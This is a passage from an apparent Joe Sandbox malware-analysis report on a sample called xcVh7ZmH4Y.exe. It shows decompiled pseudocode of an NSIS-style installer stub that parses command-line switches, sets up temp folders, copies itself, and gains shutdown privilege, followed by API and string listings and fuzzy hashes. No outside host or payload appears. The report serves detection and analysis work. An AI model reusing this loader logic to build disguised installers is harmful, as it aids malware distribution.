                                                                                      						__eflags =  *_t199 - _t234;
                                                                                      						_v12 = _t210;
                                                                                      						if( *_t199 == _t234) {
                                                                                      							_v12 = _t234;
                                                                                      							_t199 = _t199 + 2;
                                                                                      							__eflags = _t199;
                                                                                      						}
                                                                                      						__eflags =  *_t199 - 0x2f;
                                                                                      						if( *_t199 != 0x2f) {
                                                                                      							L32:
                                                                                      							_t199 = E00405E39(_t199, _v12);
                                                                                      							__eflags =  *_t199 - _t234;
                                                                                      							if(__eflags == 0) {
                                                                                      								_t199 = _t199 + 2;
                                                                                      								__eflags = _t199;
                                                                                      							}
                                                                                      							continue;
                                                                                      						} else {
                                                                                      							_t199 = _t199 + 2;
                                                                                      							__eflags =  *_t199 - 0x53;
                                                                                      							if( *_t199 != 0x53) {
                                                                                      								L24:
                                                                                      								asm("cdq");
                                                                                      								asm("cdq");
                                                                                      								_t215 = L"NCRC" & 0x0000ffff;
                                                                                      								asm("cdq");
                                                                                      								_t227 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t215;
                                                                                      								__eflags =  *_t199 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215);
                                                                                      								if( *_t199 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215)) {
                                                                                      									L29:
                                                                                      									asm("cdq");
                                                                                      									asm("cdq");
                                                                                      									_t210 = L" /D=" & 0x0000ffff;
                                                                                      									asm("cdq");
                                                                                      									_t230 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t210;
                                                                                      									__eflags =  *(_t199 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210);
                                                                                      									if( *(_t199 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210)) {
                                                                                      										L31:
                                                                                      										_t234 = 0x22;
                                                                                      										goto L32;
                                                                                      									}
                                                                                      									__eflags =  *_t199 - _t230;
                                                                                      									if( *_t199 == _t230) {
                                                                                      										 *(_t199 - 4) = _t189;
                                                                                      										__eflags = _t199;
                                                                                      										E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t199);
                                                                                      										L37:
                                                                                      										_t235 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
                                                                                      										GetTempPathW(0x400, _t235);
                                                                                      										_t116 = E004034FC(_t199, _t252);
                                                                                      										_t253 = _t116;
                                                                                      										if(_t116 != 0) {
                                                                                      											L40:
                                                                                      											DeleteFileW(L"1033"); // executed
                                                                                      											_t118 = E0040307D(_t255, _v20); // executed
                                                                                      											_v8 = _t118;
                                                                                      											if(_t118 != _t189) {
                                                                                      												L68:
                                                                                      												E00403B12();
                                                                                      												__imp__OleUninitialize();
                                                                                      												if(_v8 == _t189) {
                                                                                      													if( *0x434f94 == _t189) {
                                                                                      														L77:
                                                                                      														_t120 =  *0x434fac;
                                                                                      														if(_t120 != 0xffffffff) {
                                                                                      															_v24 = _t120;
                                                                                      														}
                                                                                      														ExitProcess(_v24);
                                                                                      													}
                                                                                      													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                                                                                      														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
                                                                                      														_v40.PrivilegeCount = 1;
                                                                                      														_v28 = 2;
                                                                                      														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
                                                                                      													}
                                                                                      													_t124 = E0040690A(4);
                                                                                      													if(_t124 == _t189) {
                                                                                      														L75:
                                                                                      														if(ExitWindowsEx(2, 0x80040002) != 0) {
                                                                                      															goto L77;
                                                                                      														}
                                                                                      														goto L76;
                                                                                      													} else {
                                                                                      														_push(0x80040002);
                                                                                      														_push(0x25);
                                                                                      														_push(_t189);
                                                                                      														_push(_t189);
                                                                                      														_push(_t189);
                                                                                      														if( *_t124() == 0) {
                                                                                      															L76:
                                                                                      															E0040140B(9);
                                                                                      															goto L77;
                                                                                      														}
                                                                                      														goto L75;
                                                                                      													}
                                                                                      												}
                                                                                      												E00405B9D(_v8, 0x200010);
                                                                                      												ExitProcess(2);
                                                                                      											}
                                                                                      											if( *0x434f1c == _t189) {
                                                                                      												L51:
                                                                                      												 *0x434fac =  *0x434fac | 0xffffffff;
                                                                                      												_v24 = E00403BEC(_t265);
                                                                                      												goto L68;
                                                                                      											}
                                                                                      											_t219 = E00405E39(L"\"C:\\Users\\Arthur\\Desktop\\xcVh7ZmH4Y.exe\" ", _t189);
                                                                                      											if(_t219 < L"\"C:\\Users\\Arthur\\Desktop\\xcVh7ZmH4Y.exe\" ") {
                                                                                      												L48:
                                                                                      												_t264 = _t219 - L"\"C:\\Users\\Arthur\\Desktop\\xcVh7ZmH4Y.exe\" ";
                                                                                      												_v8 = L"Error launching installer";
                                                                                      												if(_t219 < L"\"C:\\Users\\Arthur\\Desktop\\xcVh7ZmH4Y.exe\" ") {
                                                                                      													_t190 = E00405B08(__eflags);
                                                                                      													lstrcatW(_t235, L"~nsu");
                                                                                      													__eflags = _t190;
                                                                                      													if(_t190 != 0) {
                                                                                      														lstrcatW(_t235, "A");
                                                                                      													}
                                                                                      													lstrcatW(_t235, L".tmp");
                                                                                      													_t138 = lstrcmpiW(_t235, 0x441800);
                                                                                      													__eflags = _t138;
                                                                                      													if(_t138 == 0) {
                                                                                      														L67:
                                                                                      														_t189 = 0;
                                                                                      														__eflags = 0;
                                                                                      														goto L68;
                                                                                      													} else {
                                                                                      														__eflags = _t190;
                                                                                      														_push(_t235);
                                                                                      														if(_t190 == 0) {
                                                                                      															E00405AEB();
                                                                                      														} else {
                                                                                      															E00405A6E();
                                                                                      														}
                                                                                      														SetCurrentDirectoryW(_t235);
                                                                                      														__eflags = L"C:\\Users\\Arthur\\AppData\\Local\\Temp"; // 0x43
                                                                                      														if(__eflags == 0) {
                                                                                      															E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", 0x441800);
                                                                                      														}
                                                                                      														E0040653D(L"ppingA", _v16);
                                                                                      														_t202 = "A" & 0x0000ffff;
                                                                                      														_t144 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                                                                      														__eflags = _t144;
                                                                                      														_v12 = 0x1a;
                                                                                      														L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Borders.dat" = _t144;
                                                                                      														do {
                                                                                      															E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x120)));
                                                                                      															DeleteFileW(0x42aa28);
                                                                                      															__eflags = _v8;
                                                                                      															if(_v8 != 0) {
                                                                                      																_t149 = CopyFileW(L"C:\\Users\\Arthur\\Desktop\\xcVh7ZmH4Y.exe", 0x42aa28, 1);
                                                                                      																__eflags = _t149;
                                                                                      																if(_t149 != 0) {
                                                                                      																	E004062FD(_t202, 0x42aa28, 0);
                                                                                      																	E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x124)));
                                                                                      																	_t153 = E00405B20(0x42aa28);
                                                                                      																	__eflags = _t153;
                                                                                      																	if(_t153 != 0) {
                                                                                      																		CloseHandle(_t153);
                                                                                      																		_v8 = 0;
                                                                                      																	}
                                                                                      																}
                                                                                      															}
                                                                                      															L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Borders.dat" =  &(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Borders.dat"[0]);
                                                                                      															_t61 =  &_v12;
                                                                                      															 *_t61 = _v12 - 1;
                                                                                      															__eflags =  *_t61;
                                                                                      														} while ( *_t61 != 0);
                                                                                      														E004062FD(_t202, _t235, 0);
                                                                                      														goto L67;
                                                                                      													}
                                                                                      												}
                                                                                      												 *_t219 = _t189;
                                                                                      												_t222 =  &(_t219[2]);
                                                                                      												_t158 = E00405F14(_t264,  &(_t219[2]));
                                                                                      												_t265 = _t158;
                                                                                      												if(_t158 == 0) {
                                                                                      													goto L68;
                                                                                      												}
                                                                                      												E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t222);
                                                                                      												E0040653D(0x441000, _t222);
                                                                                      												_v8 = _t189;
                                                                                      												goto L51;
                                                                                      											}
                                                                                      											asm("cdq");
                                                                                      											asm("cdq");
                                                                                      											asm("cdq");
                                                                                      											_t205 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                                                                      											_t168 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
                                                                                      											while( *_t219 != _t205 || _t219[1] != _t168) {
                                                                                      												_t219 = _t219;
                                                                                      												if(_t219 >= L"\"C:\\Users\\Arthur\\Desktop\\xcVh7ZmH4Y.exe\" ") {
                                                                                      													continue;
                                                                                      												}
                                                                                      												break;
                                                                                      											}
                                                                                      											_t189 = 0;
                                                                                      											goto L48;
                                                                                      										}
                                                                                      										GetWindowsDirectoryW(_t235, 0x3fb);
                                                                                      										lstrcatW(_t235, L"\\Temp");
                                                                                      										_t171 = E004034FC(_t199, _t253);
                                                                                      										_t254 = _t171;
                                                                                      										if(_t171 != 0) {
                                                                                      											goto L40;
                                                                                      										}
                                                                                      										GetTempPathW(0x3fc, _t235);
                                                                                      										lstrcatW(_t235, L"Low");
                                                                                      										SetEnvironmentVariableW(L"TEMP", _t235);
                                                                                      										SetEnvironmentVariableW(L"TMP", _t235);
                                                                                      										_t176 = E004034FC(_t199, _t254);
                                                                                      										_t255 = _t176;
                                                                                      										if(_t176 == 0) {
                                                                                      											goto L68;
                                                                                      										}
                                                                                      										goto L40;
                                                                                      									}
                                                                                      									goto L31;
                                                                                      								}
                                                                                      								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
                                                                                      								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
                                                                                      									goto L29;
                                                                                      								}
                                                                                      								_t178 =  *((intOrPtr*)(_t199 + 8));
                                                                                      								__eflags = _t178 - 0x20;
                                                                                      								if(_t178 == 0x20) {
                                                                                      									L28:
                                                                                      									_t36 =  &_v20;
                                                                                      									 *_t36 = _v20 | 0x00000004;
                                                                                      									__eflags =  *_t36;
                                                                                      									goto L29;
                                                                                      								}
                                                                                      								__eflags = _t178 - _t189;
                                                                                      								if(_t178 != _t189) {
                                                                                      									goto L29;
                                                                                      								}
                                                                                      								goto L28;
                                                                                      							}
                                                                                      							_t179 =  *((intOrPtr*)(_t199 + 2));
                                                                                      							__eflags = _t179 - _t210;
                                                                                      							if(_t179 == _t210) {
                                                                                      								L23:
                                                                                      								 *0x434fa0 = 1;
                                                                                      								goto L24;
                                                                                      							}
                                                                                      							__eflags = _t179 - _t189;
                                                                                      							if(_t179 != _t189) {
                                                                                      								goto L24;
                                                                                      							}
                                                                                      							goto L23;
                                                                                      						}
                                                                                      					} else {
                                                                                      						goto L16;
                                                                                      					}
                                                                                      					do {
                                                                                      						L16:
                                                                                      						_t199 = _t199 + 2;
                                                                                      						__eflags =  *_t199 - _t210;
                                                                                      					} while ( *_t199 == _t210);
                                                                                      					goto L17;
                                                                                      				}
                                                                                      				goto L37;
                                                                                      			}

                                                                                      0x00403733
                                                                                      0x00403746
                                                                                      0x00403747
                                                                                      0x0040375c
                                                                                      0x00403761
                                                                                      0x00403763
                                                                                      0x00403765
                                                                                      0x00403781
                                                                                      0x00403788
                                                                                      0x0040379b
                                                                                      0x0040379c
                                                                                      0x004037b1
                                                                                      0x004037b7
                                                                                      0x004037b9
                                                                                      0x004037bb
                                                                                      0x004037c3
                                                                                      0x004037c5
                                                                                      0x00000000
                                                                                      0x004037c5
                                                                                      0x004037bf
                                                                                      0x004037c1
                                                                                      0x004037e6
                                                                                      0x004037ea
                                                                                      0x004037f3
                                                                                      0x004037f8
                                                                                      0x004037fe
                                                                                      0x00403809
                                                                                      0x0040380b
                                                                                      0x00403810
                                                                                      0x00403812
                                                                                      0x0040386a
                                                                                      0x0040386f
                                                                                      0x00403878
                                                                                      0x0040387f
                                                                                      0x00403882
                                                                                      0x00403a59
                                                                                      0x00403a59
                                                                                      0x00403a5e
                                                                                      0x00403a67
                                                                                      0x00403a84
                                                                                      0x00403afc
                                                                                      0x00403afc
                                                                                      0x00403b04
                                                                                      0x00403b06
                                                                                      0x00403b06
                                                                                      0x00403b0c
                                                                                      0x00403b0c
                                                                                      0x00403a9b
                                                                                      0x00403aa7
                                                                                      0x00403ab8
                                                                                      0x00403abf
                                                                                      0x00403ac6
                                                                                      0x00403ac6
                                                                                      0x00403ace
                                                                                      0x00403ada
                                                                                      0x00403ae8
                                                                                      0x00403af3
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403adc
                                                                                      0x00403adc
                                                                                      0x00403add
                                                                                      0x00403adf
                                                                                      0x00403ae0
                                                                                      0x00403ae1
                                                                                      0x00403ae6
                                                                                      0x00403af5
                                                                                      0x00403af7
                                                                                      0x00000000
                                                                                      0x00403af7
                                                                                      0x00000000
                                                                                      0x00403ae6
                                                                                      0x00403ada
                                                                                      0x00403a71
                                                                                      0x00403a78
                                                                                      0x00403a78
                                                                                      0x0040388e
                                                                                      0x00403935
                                                                                      0x00403935
                                                                                      0x00403941
                                                                                      0x00000000
                                                                                      0x00403941
                                                                                      0x0040389f
                                                                                      0x004038a7
                                                                                      0x004038f9
                                                                                      0x004038f9
                                                                                      0x004038ff
                                                                                      0x00403906
                                                                                      0x00403954
                                                                                      0x00403956
                                                                                      0x0040395b
                                                                                      0x0040395d
                                                                                      0x00403965
                                                                                      0x00403965
                                                                                      0x00403970
                                                                                      0x0040397c
                                                                                      0x00403982
                                                                                      0x00403984
                                                                                      0x00403a57
                                                                                      0x00403a57
                                                                                      0x00403a57
                                                                                      0x00000000
                                                                                      0x0040398a
                                                                                      0x0040398a
                                                                                      0x0040398c
                                                                                      0x0040398d
                                                                                      0x00403996
                                                                                      0x0040398f
                                                                                      0x0040398f
                                                                                      0x0040398f
                                                                                      0x0040399c
                                                                                      0x004039a4
                                                                                      0x004039ab
                                                                                      0x004039b3
                                                                                      0x004039b3
                                                                                      0x004039c0
                                                                                      0x004039cc
                                                                                      0x004039d6
                                                                                      0x004039d6
                                                                                      0x004039d8
                                                                                      0x004039df
                                                                                      0x004039e9
                                                                                      0x004039f5
                                                                                      0x004039fb
                                                                                      0x00403a01
                                                                                      0x00403a04
                                                                                      0x00403a0e
                                                                                      0x00403a14
                                                                                      0x00403a16
                                                                                      0x00403a1a
                                                                                      0x00403a2b
                                                                                      0x00403a31
                                                                                      0x00403a36
                                                                                      0x00403a38
                                                                                      0x00403a3b
                                                                                      0x00403a41
                                                                                      0x00403a41
                                                                                      0x00403a38
                                                                                      0x00403a16
                                                                                      0x00403a44
                                                                                      0x00403a4b
                                                                                      0x00403a4b
                                                                                      0x00403a4b
                                                                                      0x00403a4b
                                                                                      0x00403a52
                                                                                      0x00000000
                                                                                      0x00403a52
                                                                                      0x00403984
                                                                                      0x00403908
                                                                                      0x0040390b
                                                                                      0x0040390f
                                                                                      0x00403914
                                                                                      0x00403916
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403922
                                                                                      0x0040392d
                                                                                      0x00403932
                                                                                      0x00000000
                                                                                      0x00403932
                                                                                      0x004038b0
                                                                                      0x004038c8
                                                                                      0x004038d9
                                                                                      0x004038da
                                                                                      0x004038de
                                                                                      0x004038e0
                                                                                      0x004038ee
                                                                                      0x004038f5
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004038f5
                                                                                      0x004038f7
                                                                                      0x00000000
                                                                                      0x004038f7
                                                                                      0x0040381a
                                                                                      0x00403826
                                                                                      0x0040382b
                                                                                      0x00403830
                                                                                      0x00403832
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040383a
                                                                                      0x00403842
                                                                                      0x00403853
                                                                                      0x0040385b
                                                                                      0x0040385d
                                                                                      0x00403862
                                                                                      0x00403864
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403864
                                                                                      0x00000000
                                                                                      0x004037c1
                                                                                      0x0040376a
                                                                                      0x0040376c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040376e
                                                                                      0x00403772
                                                                                      0x00403776
                                                                                      0x0040377d
                                                                                      0x0040377d
                                                                                      0x0040377d
                                                                                      0x0040377d
                                                                                      0x00000000
                                                                                      0x0040377d
                                                                                      0x00403778
                                                                                      0x0040377b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040377b
                                                                                      0x00403714
                                                                                      0x00403718
                                                                                      0x0040371b
                                                                                      0x00403722
                                                                                      0x00403722
                                                                                      0x00000000
                                                                                      0x00403722
                                                                                      0x0040371d
                                                                                      0x00403720
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403720
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004036ee
                                                                                      0x004036ee
                                                                                      0x004036ef
                                                                                      0x004036f0
                                                                                      0x004036f0
                                                                                      0x00000000
                                                                                      0x004036ee
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • SetErrorMode.KERNELBASE(00008001), ref: 00403550
                                                                                      • GetVersionExW.KERNEL32(?), ref: 00403579
                                                                                      • GetVersionExW.KERNEL32(0000011C), ref: 00403590
                                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
                                                                                      • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
                                                                                      • OleInitialize.OLE32(00000000), ref: 0040366A
                                                                                      • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
                                                                                      • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
                                                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\xcVh7ZmH4Y.exe" ,00000020,"C:\Users\user\Desktop\xcVh7ZmH4Y.exe" ,00000000), ref: 004036D6
                                                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403809
                                                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403826
                                                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040383A
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403842
                                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
                                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
                                                                                      • DeleteFileW.KERNELBASE(1033), ref: 0040386F
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403956
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403965
                                                                                        • Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403970
                                                                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00441800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\xcVh7ZmH4Y.exe" ,00000000,?), ref: 0040397C
                                                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
                                                                                      • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,ppingA,?), ref: 004039FB
                                                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\xcVh7ZmH4Y.exe,0042AA28,00000001), ref: 00403A0E
                                                                                      • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403A3B
                                                                                      • OleUninitialize.OLE32(?), ref: 00403A5E
                                                                                      • ExitProcess.KERNEL32 ref: 00403A78
                                                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
                                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
                                                                                      • ExitProcess.KERNEL32 ref: 00403B0C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                                      • String ID: "C:\Users\user\Desktop\xcVh7ZmH4Y.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\xcVh7ZmH4Y.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$ppingA$~nsu
                                                                                      • API String ID: 3859024572-2903087826
                                                                                      • Opcode ID: 407f7355e1db2ff4ffdac26900de3c672c8db91765d08a40626e51ff5d6c7f7b
                                                                                      • Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
                                                                                      • Opcode Fuzzy Hash: 407f7355e1db2ff4ffdac26900de3c672c8db91765d08a40626e51ff5d6c7f7b
                                                                                      • Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph (figure not preserved; legend: Executed / Not Executed)
                                                                                      C-Code - Quality: 95%
                                                                                      			E004056DE(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                                      				struct HWND__* _v8;
                                                                                      				long _v12;
                                                                                      				struct tagRECT _v28;
                                                                                      				void* _v36;
                                                                                      				signed int _v40;
                                                                                      				int _v44;
                                                                                      				int _v48;
                                                                                      				signed int _v52;
                                                                                      				int _v56;
                                                                                      				void* _v60;
                                                                                      				void* _v68;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				struct HWND__* _t94;
                                                                                      				long _t95;
                                                                                      				int _t100;
                                                                                      				void* _t108;
                                                                                      				intOrPtr _t119;
                                                                                      				void* _t127;
                                                                                      				intOrPtr _t130;
                                                                                      				struct HWND__* _t134;
                                                                                      				int _t156;
                                                                                      				int _t159;
                                                                                      				struct HMENU__* _t164;
                                                                                      				struct HWND__* _t168;
                                                                                      				struct HWND__* _t169;
                                                                                      				int _t171;
                                                                                      				void* _t172;
                                                                                      				short* _t173;
                                                                                      				short* _t175;
                                                                                      				int _t177;
                                                                                      
                                                                                      				_t169 =  *0x433ee4;
                                                                                      				_t156 = 0;
                                                                                      				_v8 = _t169;
                                                                                      				if(_a8 != 0x110) {
                                                                                      					if(_a8 == 0x405) {
                                                                                      						_t127 = CreateThread(0, 0, E00405672, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
                                                                                      						CloseHandle(_t127); // executed
                                                                                      					}
                                                                                      					if(_a8 != 0x111) {
                                                                                      						L17:
                                                                                      						_t171 = 1;
                                                                                      						if(_a8 != 0x404) {
                                                                                      							L25:
                                                                                      							if(_a8 != 0x7b) {
                                                                                      								goto L20;
                                                                                      							}
                                                                                      							_t94 = _v8;
                                                                                      							if(_a12 != _t94) {
                                                                                      								goto L20;
                                                                                      							}
                                                                                      							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                                                                      							_a8 = _t95;
                                                                                      							if(_t95 <= _t156) {
                                                                                      								L36:
                                                                                      								return 0;
                                                                                      							}
                                                                                      							_t164 = CreatePopupMenu();
                                                                                      							AppendMenuW(_t164, _t156, _t171, E0040657A(_t156, _t164, _t171, _t156, 0xffffffe1));
                                                                                      							_t100 = _a16;
                                                                                      							_t159 = _a16 >> 0x10;
                                                                                      							if(_a16 == 0xffffffff) {
                                                                                      								GetWindowRect(_v8,  &_v28);
                                                                                      								_t100 = _v28.left;
                                                                                      								_t159 = _v28.top;
                                                                                      							}
                                                                                      							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                                                                                      								_v60 = _t156;
                                                                                      								_v48 = 0x42d268;
                                                                                      								_v44 = 0x1000;
                                                                                      								_a4 = _a8;
                                                                                      								do {
                                                                                      									_a4 = _a4 - 1;
                                                                                      									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                                                                                      								} while (_a4 != _t156);
                                                                                      								OpenClipboard(_t156);
                                                                                      								EmptyClipboard();
                                                                                      								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                                                                      								_a4 = _t108;
                                                                                      								_t172 = GlobalLock(_t108);
                                                                                      								do {
                                                                                      									_v48 = _t172;
                                                                                      									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                                                                      									 *_t173 = 0xd;
                                                                                      									_t175 = _t173 + 2;
                                                                                      									 *_t175 = 0xa;
                                                                                      									_t172 = _t175 + 2;
                                                                                      									_t156 = _t156 + 1;
                                                                                      								} while (_t156 < _a8);
                                                                                      								GlobalUnlock(_a4);
                                                                                      								SetClipboardData(0xd, _a4);
                                                                                      								CloseClipboard();
                                                                                      							}
                                                                                      							goto L36;
                                                                                      						}
                                                                                      						if( *0x433ecc == _t156) {
                                                                                      							ShowWindow( *0x434f08, 8);
                                                                                      							if( *0x434f8c == _t156) {
                                                                                      								_t119 =  *0x42c240; // 0x7d1fcc
                                                                                      								_t57 = _t119 + 0x34; // 0xffffffd5
                                                                                      								E0040559F( *_t57, _t156);
                                                                                      							}
                                                                                      							E00404472(_t171);
                                                                                      							goto L25;
                                                                                      						}
                                                                                      						 *0x42ba38 = 2;
                                                                                      						E00404472(0x78);
                                                                                      						goto L20;
                                                                                      					} else {
                                                                                      						if(_a12 != 0x403) {
                                                                                      							L20:
                                                                                      							return E00404500(_a8, _a12, _a16);
                                                                                      						}
                                                                                      						ShowWindow( *0x433ed0, _t156);
                                                                                      						ShowWindow(_t169, 8);
                                                                                      						E004044CE(_t169);
                                                                                      						goto L17;
                                                                                      					}
                                                                                      				}
                                                                                      				_v52 = _v52 | 0xffffffff;
                                                                                      				_v40 = _v40 | 0xffffffff;
                                                                                      				_t177 = 2;
                                                                                      				_v60 = _t177;
                                                                                      				_v56 = 0;
                                                                                      				_v48 = 0;
                                                                                      				_v44 = 0;
                                                                                      				asm("stosd");
                                                                                      				asm("stosd");
                                                                                      				_t130 =  *0x434f10;
                                                                                      				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                                                                      				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                                                                      				 *0x433ed0 = GetDlgItem(_a4, 0x403);
                                                                                      				 *0x433ec8 = GetDlgItem(_a4, 0x3ee);
                                                                                      				_t134 = GetDlgItem(_a4, 0x3f8);
                                                                                      				 *0x433ee4 = _t134;
                                                                                      				_v8 = _t134;
                                                                                      				E004044CE( *0x433ed0);
                                                                                      				 *0x433ed4 = E00404E27(4);
                                                                                      				 *0x433eec = 0;
                                                                                      				GetClientRect(_v8,  &_v28);
                                                                                      				_v52 = _v28.right - GetSystemMetrics(_t177);
                                                                                      				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
                                                                                      				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
                                                                                      				if(_a8 >= 0) {
